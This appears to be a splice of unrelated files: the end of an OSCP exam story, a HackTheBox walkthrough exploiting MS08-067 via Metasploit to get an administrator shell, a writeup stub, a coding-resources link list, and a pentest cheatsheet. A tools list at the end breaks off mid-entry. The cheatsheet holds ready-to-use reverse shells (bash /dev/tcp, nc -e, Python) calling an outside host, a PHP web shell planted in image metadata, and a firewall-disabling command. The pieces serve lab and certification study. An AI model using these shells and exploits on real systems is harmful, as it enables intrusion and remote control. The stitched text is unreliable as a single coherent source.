felt refreshed and ready to start. This time it went much much better. Even the harder machines seemed easy to crack and I reached the required 70 points (BoF, 1x25 1x20) in only 5 hours. I made dinner and then pwned the 10pt in about 30min. I finished up writing the report and then tried to tackle the last 20 pointer, but after 4 hours of trial and error I just could not crack it. I went to bed, slept 8 hours and finished the report the next day. Submitting the pdf 2 hours before the VPN closed. One day later I received the confirmation email that I passed 🎉 ## Final thoughts and advice ### Exam Don't get too stressed, remember all the machines are meant to be exploited well within 24 hours. If you don't make any progress in 2h allow yourself to switch to another machine, don't keep hopping between them this will just get you confused. During your prep you also didn't do that, why start now? ### Course Don't be discouraged by all the posts that you read of people failing, in general OSCP was a really nice journey and trains to well for the real world. There were many times I was so excited about pentesting that I could barely sleep. It should not feel like a chore, hacking is supposed to be fun!
HackTheBox Walkthrough - Lemon === This post is writeup of the HackTheBox machine created by ch4p. ## Nmsp Nmap result ```sh # nmap -sV -sC --script=vuln 10.10.10.4 Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-28 12:27 EDT Nmap scan report for 10.10.10.4 Host is up (0.32s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 139/tcp open netbios-ssn Microsoft Windows netbios-ssn |_clamav-exec: ERROR: Script execution failed (use -d to debug) 445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds |_clamav-exec: ERROR: Script execution failed (use -d to debug) 3389/tcp closed ms-wbt-server Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp Host script results: |_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED | smb-vuln-ms08-067: | VULNERABLE: | Microsoft Windows system vulnerable to remote code execution (MS08-067) | State: VULNERABLE | IDs: CVE:CVE-2008-4250 | The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, | Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary | code via a crafted RPC request that triggers the overflow during path canonicalization. | | Disclosure date: 2008-10-23 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250 |_ https://technet.microsoft.com/en-us/library/security/ms08-067.aspx |_smb-vuln-ms10-054: false |_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug) | smb-vuln-ms17-010: | VULNERABLE: | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) | State: VULNERABLE | IDs: CVE:CVE-2017-0143 | Risk factor: HIGH | A critical remote code execution vulnerability exists in Microsoft SMBv1 | servers (ms17-010). | | Disclosure date: 2017-03-14 | References: | https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/ | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 50.41 seconds ``` This machine have some RCE vuln. I will try to use `MS08-067`. ```sh # msfconsole [-] ***rting the Metasploit Framework console.../ [-] * WARNING: No database support: No database YAML file [-] *** .~+P``````-o+:. -o+:. .+oooyysyyssyyssyddh++os-````` ``````````````` ` +++++++++++++++++++++++sydhyoyso/:.````...`...-///::+ohhyosyyosyy/+om++:ooo///o ++++///////~~~~///////++++++++++++++++ooyysoyysosso+++++++++++++++++++///oossosy --.` .-.-...-////+++++++++++++++////////~~//////++++++++++++/// `...............` `...-/////...` .::::::::::-. .::::::- .hmMMMMMMMMMMNddds\...//M\\.../hddddmMMMMMMNo :Nm-/NMMMMMMMMMMMMM$$NMMMMm&&MMMMMMMMMMMMMMy .sm/`-yMMMMMMMMMMMM$$MMMMMN&&MMMMMMMMMMMMMh` -Nd` :MMMMMMMMMMM$$MMMMMN&&MMMMMMMMMMMMh` -Nh` .yMMMMMMMMMM$$MMMMMN&&MMMMMMMMMMMm/ `oo/``-hd: `` .sNd :MMMMMMMMMM$$MMMMMN&&MMMMMMMMMMm/ .yNmMMh//+syysso-`````` -mh` :MMMMMMMMMM$$MMMMMN&&MMMMMMMMMMd .shMMMMN//dmNMMMMMMMMMMMMs` `:```-o++++oooo+:/ooooo+:+o+++oooo++/ `///omh//dMMMMMMMMMMMMMMMN/:::::/+ooso--/ydh//+s+/ossssso:--syN///os: /MMMMMMMMMMMMMMMMMMd. `/++-.-yy/...osydh/-+oo:-`o//...oyodh+ -hMMmssddd+:dMMmNMMh. `.-=mmk.//^^^\\.^^`:++:^^o://^^^\\`:: .sMMmo. -dMd--:mN/` ||--X--|| ||--X--|| ........../yddy/:...+hmo-...hdd:............\\=v=//............\\=v=//......... ================================================================================ =====================+--------------------------------+========================= =====================| Session one died of dysentery. |========================= =====================+--------------------------------+========================= ================================================================================ Press ENTER to size up the situation %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%% Date: April 25, 1848 %%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%% Weather: It's always cool in the lab %%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%% Health: Overweight %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%% Caffeine: 12975 mg %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%% Hacked: All the things %%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Press SPACE BAR to continue =[ metasploit v5.0.53-dev ] + -- --=[ 1931 exploits - 1079 auxiliary - 331 post ] + -- --=[ 556 payloads - 45 encoders - 10 nops ] + -- --=[ 7 evasion ] msf5 > use exploit/windows/smb/ms08_067_netapi msf5 exploit(windows/smb/ms08_067_netapi) > ``` Exploit it and got a shell with Administrator permission. ```sh msf5 exploit(windows/smb/ms08_067_netapi) > set RHOST 10.10.10.4 RHOST => 10.10.10.4 msf5 exploit(windows/smb/ms08_067_netapi) > exploit [*] Started reverse TCP handler on 10.10.14.15:4444 [*] 10.10.10.4:445 - Automatically detecting the target... [*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English [*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX) [*] 10.10.10.4:445 - Attempting to trigger the vulnerability... [*] Sending stage (180291 bytes) to 10.10.10.4 [*] Meterpreter session 1 opened (10.10.14.15:4444 -> 10.10.10.4:1031) at 2019-10-28 12:39:39 -0400 meterpreter > ``` Get user flag. ```sh meterpreter > search -f user.txt Found 1 result... c:\Documents and Settings\john\Desktop\user.txt (32 bytes) meterpreter > shell Process 1840 created. Channel 4 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32>type "c:\Documents and Settings\john\Desktop\user.txt" ``` Get root flag. ```sh meterpreter > search -f root.txt Found 1 result... c:\Documents and Settings\Administrator\Desktop\root.txt (32 bytes) meterpreter > shell Process 280 created. Channel 5 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32>type "c:\Documents and Settings\Administrator\Desktop\root.txt" ```
# Developer - HackTheBox - Writeup Linux, 40 Base Points, Hard ![info.JPG](images/info.JPG) ## Machine ![‏‏Developer.JPG](images/Developer.JPG) ## Developer Solution ### User Let's start with ```nmap``` scanning: ```console ┌─[evyatar@parrot]─[/hackthebox/Developer] └──╼ $ nmap -sV -sC -oA nmap/Developer 10.10.11.103 Starting Nmap 7.80 ( https://nmap.org ) at 2021-11-09 22:00 IST Nmap scan report for 10.10.11.103 Host is up (0.27s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.41 |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Did not follow redirect to http://developer.htb/ Service Info: Host: developer.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` By observing port 80 on [http://developer.htb/](http://developer.htb/) we get the following web page: ![port80.JPG](images/port80.JPG) ## Developer is still active machine - [Full writeup](Developer-Writeup.pdf) available with root hash password only. Telegram: [@evyatar9](https://t.me/evyatar9) Discord: [evyatar9](https://discordapp.com/users/812805349815091251) ![pwn.JPG](images/pwn.JPG)
## oscp I passed the Offensive Security Certified Professional (OSCP) exam on 2 September 2021 using this [cheat-sheet](/cheatsheets/README.md) and a number of other online resources. ### Table of Contents * [Bootstraps](/bootstraps/) * [goshell](/bootstraps/goshell.go) * [new-ctf](/bootstraps/new-ctf.sh) * [supply-drop](/bootstraps/supply-drop.sh) * [save-screenshots-here](/bootstraps/save-screenshots-here.py) * [Cheat-Sheets](/cheatsheets/) * [OSCP Cheat-Sheet](/cheatsheets/README.md) * [Miscellaneous Commands](/cheatsheets/miscellaneous-commands.md) * [Guides](/guides/) * [Buffer Overflow Guide](/guides/buffer-overflow-guide.md) * [Report Guide](/guides/report-guide.md) * [Walkthroughs](/walkthroughs/) * [HackTheBox](/walkthroughs/htb/) * [Proving Grounds](/walkthroughs/pg/) * [TryHackMe](/walkthroughs/thm/)
# Helpful Tech Resources _Disclaimer: Please don't get stuck in 'tutorial hell'. Try to execute what you learned in a project or task of your own and then move on to the next interesting thing.<br>_ Over the last few months I spent a lot of time on social media, collecting all kinds of interesting, educational, and helpful resources. It was nearing the 100 links so I thought I would share them with the world, so here you go :) <br> Feel free to contact me on:<br> [![Twitter](https://img.shields.io/badge/lovelacecoding-%231DA1F2.svg?style=for-the-badge&logo=Twitter&logoColor=white)](https://www.twitter.com/lovelacecoding) [![Instagram](https://img.shields.io/badge/lovelacecoding-%23E4405F.svg?style=for-the-badge&logo=Instagram&logoColor=white)](https://www.instagram.com/lovelacecoding)<br> Also don't forget to give this repository a star ⭐ if you like it to keep up with changes. Use these resources yourself or share them with people that it could be helpful to. Thank you! ## Comments and Index Not all of these resources are free. **Paid**: you have to pay for the product or for a subscription. **Freemium**: the resource is partly free, partly paid * [Interactive Coding Courses](#interactive-coding-courses) * [Coding Challenges](#coding-challenges) * [Coding Project Inspiration](#coding-project-inspiration) * [Coding - What To Learn Next](#coding---what-to-learn-next) * [Blog Platforms](#blog-platforms) * [Video Course Platforms](#video-course-platforms) * [Helpful GitHub Repositories](#helpful-github-repositories) * [UI / UX](#ui--ux) * [System Administration & Networks](#system-administration--networks) * [DevOps](#devops) * [NoCode & Serverless](#nocode--serverless) * [Security & Hacking](#security--hacking) * [APIs](#apis) * [Studying](#studying) * [Career](#career) * [Cool Discord Communities](#cool-discord-communities) ## Interactive Coding Courses | Name | Languages | Notes | |--------------------|:---------------------------------:|----------| | [FreeCodeCamp](https://www.freecodecamp.org/) | <div align="center">![HTML5](https://img.shields.io/badge/html5-%23E34F26.svg?style=for-the-badge&logo=html5&logoColor=white)![CSS3](https://img.shields.io/badge/css3-%231572B6.svg?style=for-the-badge&logo=css3&logoColor=white)![JavaScript](https://img.shields.io/badge/javascript-%23323330.svg?style=for-the-badge&logo=javascript&logoColor=%23F7DF1E)</div> | | | [The Odin Project](https://www.theodinproject.com/) | <div align="center">![HTML5](https://img.shields.io/badge/html5-%23E34F26.svg?style=for-the-badge&logo=html5&logoColor=white)![CSS3](https://img.shields.io/badge/css3-%231572B6.svg?style=for-the-badge&logo=css3&logoColor=white)![JavaScript](https://img.shields.io/badge/javascript-%23323330.svg?style=for-the-badge&logo=javascript&logoColor=%23F7DF1E)![Ruby](https://img.shields.io/badge/ruby-%23CC342D.svg?style=for-the-badge&logo=ruby&logoColor=white)</div> | Focused on Web Development | | [Scrimba](https://scrimba.com/) | <div align="center">![HTML5](https://img.shields.io/badge/html5-%23E34F26.svg?style=for-the-badge&logo=html5&logoColor=white)![CSS3](https://img.shields.io/badge/css3-%231572B6.svg?style=for-the-badge&logo=css3&logoColor=white)![JavaScript](https://img.shields.io/badge/javascript-%23323330.svg?style=for-the-badge&logo=javascript&logoColor=%23F7DF1E)</div> | **Freemium** - Focused on Web Development | | [DataCamp](https://www.datacamp.com/) |<div align="center">![Python](https://img.shields.io/badge/python-3670A0?style=for-the-badge&logo=python&logoColor=ffdd54)![R](https://img.shields.io/badge/r-%23276DC3.svg?style=for-the-badge&logo=r&logoColor=white)</div> | **Freemium** - Focused on Machine Learning and Data Science | | [Kaggle](https://www.kaggle.com/learn) |<div align="center">![Python](https://img.shields.io/badge/python-3670A0?style=for-the-badge&logo=python&logoColor=ffdd54)![SQL](https://img.shields.io/badge/SQL-00000F?style=for-the-badge&logo=sql&logoColor=white)</div> | Focused on Machine Learning | | [CodeAcademy](https://www.codecademy.com/) |<div align="center">![HTML5](https://img.shields.io/badge/html5-%23E34F26.svg?style=for-the-badge&logo=html5&logoColor=white)![CSS3](https://img.shields.io/badge/css3-%231572B6.svg?style=for-the-badge&logo=css3&logoColor=white)![JavaScript](https://img.shields.io/badge/javascript-%23323330.svg?style=for-the-badge&logo=javascript&logoColor=%23F7DF1E)![Python](https://img.shields.io/badge/python-3670A0?style=for-the-badge&logo=python&logoColor=ffdd54)</div> | **Freemium** - Has more languages than listed | | [SoloLearn](https://www.sololearn.com) |<div align="center">![HTML5](https://img.shields.io/badge/html5-%23E34F26.svg?style=for-the-badge&logo=html5&logoColor=white)![CSS3](https://img.shields.io/badge/css3-%231572B6.svg?style=for-the-badge&logo=css3&logoColor=white)![JavaScript](https://img.shields.io/badge/javascript-%23323330.svg?style=for-the-badge&logo=javascript&logoColor=%23F7DF1E)![Python](https://img.shields.io/badge/python-3670A0?style=for-the-badge&logo=python&logoColor=ffdd54)</div> | **Freemium** - Has more languages than listed | | [Educative](https://www.educative.io/) |<div align="center">![HTML5](https://img.shields.io/badge/html5-%23E34F26.svg?style=for-the-badge&logo=html5&logoColor=white)![CSS3](https://img.shields.io/badge/css3-%231572B6.svg?style=for-the-badge&logo=css3&logoColor=white)![JavaScript](https://img.shields.io/badge/javascript-%23323330.svg?style=for-the-badge&logo=javascript&logoColor=%23F7DF1E)![Python](https://img.shields.io/badge/python-3670A0?style=for-the-badge&logo=python&logoColor=ffdd54)</div> | **Paid** - Has more languages than listed | | [Treehouse](https://teamtreehouse.com/) |<div align="center">![HTML5](https://img.shields.io/badge/html5-%23E34F26.svg?style=for-the-badge&logo=html5&logoColor=white)![CSS3](https://img.shields.io/badge/css3-%231572B6.svg?style=for-the-badge&logo=css3&logoColor=white)![JavaScript](https://img.shields.io/badge/javascript-%23323330.svg?style=for-the-badge&logo=javascript&logoColor=%23F7DF1E)![Python](https://img.shields.io/badge/python-3670A0?style=for-the-badge&logo=python&logoColor=ffdd54)</div> | **Paid** | | [App Academy Open](https://www.appacademy.io/course/app-academy-open) |<div align="center">![HTML5](https://img.shields.io/badge/html5-%23E34F26.svg?style=for-the-badge&logo=html5&logoColor=white)![CSS3](https://img.shields.io/badge/css3-%231572B6.svg?style=for-the-badge&logo=css3&logoColor=white)![JavaScript](https://img.shields.io/badge/javascript-%23323330.svg?style=for-the-badge&logo=javascript&logoColor=%23F7DF1E)![Ruby](https://img.shields.io/badge/ruby-%23CC342D.svg?style=for-the-badge&logo=ruby&logoColor=white)</div> | | | [GA Dash](https://dash.generalassemb.ly/) |<div align="center">![HTML5](https://img.shields.io/badge/html5-%23E34F26.svg?style=for-the-badge&logo=html5&logoColor=white)![CSS3](https://img.shields.io/badge/css3-%231572B6.svg?style=for-the-badge&logo=css3&logoColor=white)![JavaScript](https://img.shields.io/badge/javascript-%23323330.svg?style=for-the-badge&logo=javascript&logoColor=%23F7DF1E)</div> | | | [Khan Academy](https://bit.ly/2XAyDEv) |<div align="center">![HTML5](https://img.shields.io/badge/html5-%23E34F26.svg?style=for-the-badge&logo=html5&logoColor=white)![CSS3](https://img.shields.io/badge/css3-%231572B6.svg?style=for-the-badge&logo=css3&logoColor=white)![JavaScript](https://img.shields.io/badge/javascript-%23323330.svg?style=for-the-badge&logo=javascript&logoColor=%23F7DF1E)</div> | | | [MongoDB University](https://university.mongodb.com/)|<div align="center">![MongoDB](https://img.shields.io/badge/MongoDB-%234ea94b.svg?style=for-the-badge&logo=mongodb&logoColor=white)</div> | Focused on NoSQL | ## Coding Challenges Coding challenges can be really fun. It can also help you to understand the logic behind the code you're writing better and can help you with getting through tech interviews | Name | Notes | |-------------------|---------------------------------------------------------------------------| | [Leetcode](https://leetcode.com/) | **Freemium** - Focused on code challenges used in big tech company interviews | | [Exercism](https://exercism.org/) | Including free mentorship | | [CodinGame](https://www.codingame.com/start) | | | [Coderbyte](https://coderbyte.com/) | | | [CodeWars](https://www.codewars.com/) | | | [Project Eulers](https://projecteuler.net/) | Focused on math related coding challenges | | [Front-end mentors](https://www.frontendmentor.io/) | Focused on frontend challenges by making projects | ## Coding Project Inspiration It's important to actually use what you learnt. Here are some long GitHub repositories to get some inspiration for your next project. | Name | Notes | |-----------------------------------------------------------------------------------------|----------------------------------------------| | [App Ideas](https://github.com/florinpop17/app-ideas) | By [Florin Pop](https://www.florin-pop.com/) | | [Project Megalist](https://github.com/karan/Projects) | By [Karan Goel](https://goel.io/) | | [Open Source Ideas](https://github.com/open-source-ideas/ideas) | | | [Project Based Learning](https://github.com/practical-tutorials/project-based-learning) | | ## Coding - What to Learn Next | Name | Notes | |-----------------------------------------------------------------------------|----------------------------------------------------------------------------| | [Bento](https://bento.io/) | Has multiple language tracks that help you find the best quality resources | | [Developer Roadmap](https://roadmap.sh/) | Community made flowcharts for developers | | [Hackr.io](https://hackr.io/) | Focused on finding the best courses and tutorials | | [The Missing Semester of Your CS Education](https://missing.csail.mit.edu/) | Focused on the aspects of being a developer that you may have missed | ## Blog Platforms People learn from people. Write your own blogposts to teach and inspire other or find likeminded people that write posts about topics you're interested in. | Name | Notes | |------------------------------------|-------------------------------------| | [Hashnode](https://hashnode.com/) | Focused on developers | | [Medium](https://medium.com/) | | | [DEV](https://dev.to/) | Has a podcast and video section too | | [Tumblr](https://www.tumblr.com/) | | | [Blogger](https://www.blogger.com) | | ## Video Course Platforms Do you learn best by watching videos? Find some really great courses, paid or free, on these platforms (or create your own). | Name | Notes | |------------------------------------------------------------|----------| | [Pluralsight](https://www.pluralsight.com/) | Paid | | [Coursera](https://www.coursera.org/) | Freemium | | [Udemy](https://www.udemy.com/) | Freemium | | [YouTube](https://www.youtube.com/) | | | [Microsoft Learn](https://docs.microsoft.com/en-us/learn/) | | | [Skillshare](https://www.skillshare.com/) | Paid | | [Fireship.io](https://fireship.io/) | Freemium | ## Helpful GitHub Repositories | Name | Notes | |-------------------------------------------------------------------------------------|----------------------------------------------------------------------------------| | [Awesome](https://github.com/sindresorhus/awesome) | Awesome lists about all kind of interesting tech topics | | [You Don't Know JS](https://github.com/getify/You-Dont-Know-JS) | In depth bookseries about JavaScript - By [Kyle Simpson](https://me.getify.com/) | | [Open Source Society University](https://github.com/ossu/computer-science) | Path to self-taught education in Computer Science | | [Free Programming Books](https://github.com/EbookFoundation/free-programming-books) | Freely available programming books in alot of languages | | [Free Certifications](https://github.com/cloudcommunity/free-certifications) | Curated list of free courses & certificates | | [30 Seconds of Code](https://github.com/30-seconds/30-seconds-of-code) | Short coding snippets for your development needs | ## UI / UX | Name | Notes | |-------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------| | [Hack Design](https://hackdesign.org/) | Recieve a design lesson in your inbox every week by a design pro | | [Figma - Learn Design](https://www.figma.com/resources/learn-design/) | Kick start your design education with lessons by Figma | | [Learn UX](https://learnux.io/) | UI/UX video courses | | [Coursera - UI/UX Design Specialization](https://www.coursera.org/specializations/ui-ux-design) | Allround video course about UI/UX design | | [Awesome Design](https://github.com/gztchan/awesome-design) | List with helpful design resources | | [unDraw](https://undraw.co/) | Open Source and free illustrations for your projects | | [Free Design Resources](https://twitter.com/hey_Ololade/status/1440220472554098695?t=kMHFFC6z0_WklLDoO-VdlA&s=19) | Huge list of free design resources - By [Bello Ololade](https://twitter.com/hey_Ololade) | ## System Administration & Networks | Name | Notes | |---------------------------------------------------------------------------------------------------|----------------------------| | [Powershell Course](https://docs.microsoft.com/en-us/learn/modules/introduction-to-powershell/) | | | [Windows Server Courses](https://bit.ly/3EqU6jh) | | | [Linux Unhatched](https://www.netacad.com/courses/os-it/ndg-linux-unhatched) | | | [Linux Essentials](https://www.netacad.com/courses/os-it/ndg-linux-essentials) | | | [Introduction to Networks](https://www.netacad.com/courses/networking/ccna-introduction-networks) | Paid | | [CMD Challenge](https://cmdchallenge.com/) | Challenge your bash skills | ## DevOps | Name | Notes | |-------------------------------------------------------------------------------------------------------------------|------------------------------------------------| | [Docker Curriculum](https://docker-curriculum.com/) | | | [Docker and VS Code Tutorial](https://docs.microsoft.com/en-us/visualstudio/docker/tutorials/docker-tutorial) | | | [Awesome Docker](https://github.com/veggiemonk/awesome-docker) | Curated resource list all about Docker | | [Docker Cheatsheet](https://www.docker.com/sites/default/files/d8/2019-09/docker-cheat-sheet.pdf) | PDF file | | [Learn Kuburnetes](https://kubernetes.io/docs/tutorials/kubernetes-basics/) | | | [Digital Ocean-Intro to Kuburnetes](https://do.co/2XDoJ50) | | | [CI/CD With Azure DevOps](https://docs.microsoft.com/en-us/learn/modules/implement-ci-cd-azure-devops/) | | | [CI/CD With GitHub Actions](https://docs.microsoft.com/en-us/azure/app-service/deploy-github-actions) | | | [Get Started With Azure](https://medium.com/bb-tutorials-and-thoughts/how-to-get-started-with-azure-87ffd3bcfb7a) | | | [Awesome Azure Learning](https://github.com/ddneves/awesome-azure-learning) | Curated resource list all about learning Azure | | [Get Started With AWS](https://aws.amazon.com/getting-started/) | | | [Awesome AWS](https://github.com/donnemartin/awesome-aws) | Curated resource list all about AWS | ## NoCode & Serverless | Name | Notes | |----------------------------------------------------------------------------------------|----------------------------------------------------------| | [Wordpress No-Code Tutorials](https://wpnocode.com/) | | | [Webflow](https://webflow.com/) | | | [Awesome NoCode/LowCode](https://github.com/kairichard/awesome-nocode-lowcode) | Curated resource list all about NoCode & LowCode | | [Azure Functions University](https://github.com/marcduiker/azure-functions-university) | By [Marc Duiker](https://twitter.com/marcduiker) | | [The Serverless Framework](https://github.com/serverless/serverless) | | | [Awesome Serverless](https://github.com/anaibol/awesome-serverless) | Curated resource list all about serverless technology | ## Security & Hacking | Name | Notes | |-----------------------------------------------------------------------------------------------------------|---------------------------------------------| | [Hacker101](https://www.hacker101.com/) | CTF challenges and video courses | | [CoHackers](https://cohackers.co//) | Find a mentor in hacking | | [TryHackMe](https://tryhackme.com/) | All kinds of courses on different levels | | [Hack The Box](https://www.hackthebox.eu/) | Virtual Machine challenges | | [Introduction to Cybersecurity](https://www.netacad.com/courses/cybersecurity/introduction-cybersecurity) | Course (with certification) by Cisco | | [Awesome Security](https://github.com/sbilly/awesome-security) | A curated resources list all about security | ## APIs Looking for an API to use in your next project? Try one of these resources | Name | Notes | |-----------------------------------------------------------|-------| | [RapidAPI Hub](https://rapidapi.com/hub) | | | [Public APIs](https://github.com/public-apis/public-apis) | | | [API list](https://apilist.fun/) | | | [Awesome APIs](https://github.com/TonnyL/Awesome_APIs) | | ## Studying | Name | Notes | |-----------------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------| | [25 Studying Tips](https://www.mydegreeguide.com/how-to-study-tips/) | Scientifically proven tips to help you with effectively studying | | [Crash Course - Study Skills](https://thecrashcourse.com/courses/studyskills) | Video Course all about studying | | [What is The Pomodoro Technique](https://todoist.com/nl/productivity-methods/pomodoro-technique) | How to study in small parts | | [Pomodoro Timer](https://pomofocus.io/) | | | [The Best Note-Taking Methods](https://medium.goodnotes.com/the-best-note-taking-methods-for-college-students-451f412e264e) | | | [Cornell Note Taking](https://medium.goodnotes.com/study-with-ease-the-best-way-to-take-notes-2749a3e8297b) | | ## Career | Name | Notes | |--------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------| | [Break Into Tech (without coding)](https://www.breakinto.tech/) | Focused on all kinds of information on how to get a tech job without being a developer | | [Developer Portfolio Inspiration](https://github.com/emmabostian/developer-portfolios) | Over 100 examples of developer portfolios - By [Emma Bostian](https://twitter.com/emmabostian) | | [Make your GitHub Page stand out](https://www.eddiejaoude.io/course-github-profile-landing) | Video course about how to make your GitHub page look amazing - By [Eddie Jaoude](https://www.eddiejaoude.io) | | [Get a Job Using LinkedIn](https://www.youtube.com/playlist?list=PL54X5yR8qizsMpvTCqUIEFMeEp-chvcxk) | YouTube Playlist full of tips on how to make your LinkedIn page better - By [Danny Thompson](https://twitter.com/DThompsonDev) | | [Open Source Internship Programs](https://github.com/deepanshu1422/List-Of-Open-Source-Internships-Programs) | A curated list of all open source internship programs | | [Summer 2022 Internships](https://github.com/pittcsc/Summer2022-Internships) | A list of summer 2022 internship programs in the USA | | [The Forage](https://www.theforage.com/) | Take part of a virtual work experience program and get hired | | [Tech Interview Handbook](https://techinterviewhandbook.org/) | | | [Coding Interview University](https://github.com/jwasham/coding-interview-university) | By [John Washam](https://startupnextdoor.com/) | | [Awesome Interview Questions](https://github.com/DopplerHQ/awesome-interview-questions) | Links to frequently asked questions on tech interviews | | [Toastmasters](https://www.toastmasters.org/) | Join a toastmasters group anywhere in the world to get better at public speaking ## Cool Discord Communities | Name | Notes | |--------------------------------------------------------------|-----------------------------------------------------------| | [The Programmer Hangout](https://theprogrammershangout.com/) | Geared towards all kind of developers | | [Devcord](https://devcord.com/) | Geared towards web developers | | [The Coding Den](https://discord.com/invite/code) | Geared towards developers that have questions / need help | | [Commit Your Code!](https://bit.ly/30YfIop) | Geared towards developers (+ career advice) | | [EddieHub](https://discord.com/invite/jZQs6Wus) | Geared towards developers interested in open source | | [4C](https://discord.gg/M5TKk7NH) | Geared towards people that create (tech) content online | | [Buildspace](https://buildspace.so/) | Geared towards developers interested in Web3 |
## CHEATSHEET ### Linux Find user owned files ~~~ find / -user $(whoami) 2>/dev/null | egrep -v '(/proc)' ~~~ Find writeable files ~~~ find / -writeable 2>/dev/null | egrep -v '(/proc|/run|/dev)' ~~~ Find readable files with following extensions ~~~ find / -readable 2>/dev/null | egrep '(\.key$|\.pub$|\.bak$|\.crt$|\.ca$|^id_rsa)' ~~~ Find files that aren't installed by the system ~~~ for i in $(ls $(pwd)/*); do dpkg --search $i 1>/dev/null; done ~~~ Bash reverse shell ~~~ bash -i >& /dev/tcp/10.10.10.10/444 0>&1 ~~~ Netcat reverse shell ~~~ nc -e /bin/bash 10.10.10.10 444 nc -e /bin.sh 10.10.10.10 444 ~~~ Python reverse shell ~~~ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.10",444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")' ~~~ Upgrade shell with Python ~~~ python3 -c 'import pty; pty.spawn("/bin/bash")' CTRL + Z stty raw -echo F+G+ENTER export TERM=xterm ~~~ Fix terminal ~~~ stty -a 34 cols 136 stty rows ~~~ Inject PHP into image ~~~ exiv2 -c'A "<?php system($_REQUEST['cmd']);?>"!' backdoor.jpeg exiftool “-comment<=back.php” back.png ~~~ Cracking SSH ~~~ ssh2john id_rsa > id_rsa.hash john --wordlist=wordlist.txt id_rsa.hash ~~~ Cracking /etc/shadow ~~~ unshadow passwd.hashes shadow.hashes > unshadowed_passwords.txt john --wordlist=wordlist.txt passwords.txt ~~~ WFUZZ ~~~ wfuzz -w /usr/share/wordlists/dirb/common.txt --hc 404,500 -u http://10.10.10.168:8080/ ~~~ Gobuster ~~~ gobuster dir -u http://10.10.10.170/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php gobuster vhost -u http://10.10.10.170/ -w /usr/share/SecLists/Discovery/DNS/subdomains-top1million-110000.txt ~~~ **Windows** Metasploit windows meterpreter session ~~~ execute -f cmd.exe -c -H shell netsh firewall show opmode netsh advfirewall set allprofiles state off getsystem ~~~
# Pentest Tools ![](img.png) The tools listed below are commonly used in penetration testing, and the tool catalog is referenced from Kali Tools, most of which are open source software. The project long-term supplementary update QAQ ## TODO * [x] Directory * [ ] Source Code * [ ] Documentation ## List * [Information Gathering](#information-gathering) * [Google Hack](#google-hack) * [Github](#Github) * [Port-Scan](#port-scan) * [OSINT](#OSINT) * [Vulnerability Analysis](#vulnerability-analysis) * [Web Applications](#web-applications) * [CMS & Framwork Identification](#cms--framwork-identification) * [Web Applications Proxies](#web-applications-proxies) * [Vulnerability Scan](#vulnerability-scan) * [Web Crawlers & Directory Brute Force](#web-crawlers--directory-brute-force) * [Docker Scanners](#Docker-Scanners) * [Database Assessment](#database-assessment) * [Password Attacks](#password-attacks) * [Wireless Attacks](#Wireless-Attacks) * [Wireless Tools](#Wireless-Tools) * [Reverse Engineering](#Reverse-Engineering) * [Exploitation Tools](#exploitation-tools) * [Vulnerability Search](#vulnerability-search) * [Cross-site Scripting](#cross-site-scriptingxss) * [Sql Injection](d#sql-injection) * [Command Injection](#command-injection) * [File Include](#file-include) * [File Upload vulnerability](#file-upload-vulnerability) * [XML External Entity Attack(XXE)](#xml-external-entity-attackxxe) * [Cross-site request forgery (CSRF)](#Cross-site-request-forgery-(CSRF)) * [Exploit Framework](#exploit-framework) * [Machine Learning](#Machine-Learning) * [Automate](#Automate) * [Sniffing & Spoofng](#Sniffing-&-Spoofng) * [Maintaining Access](#maintaining-access) * [Shell](#Shell) * [Web Shell](#web-shell) * [Privilege Escalation 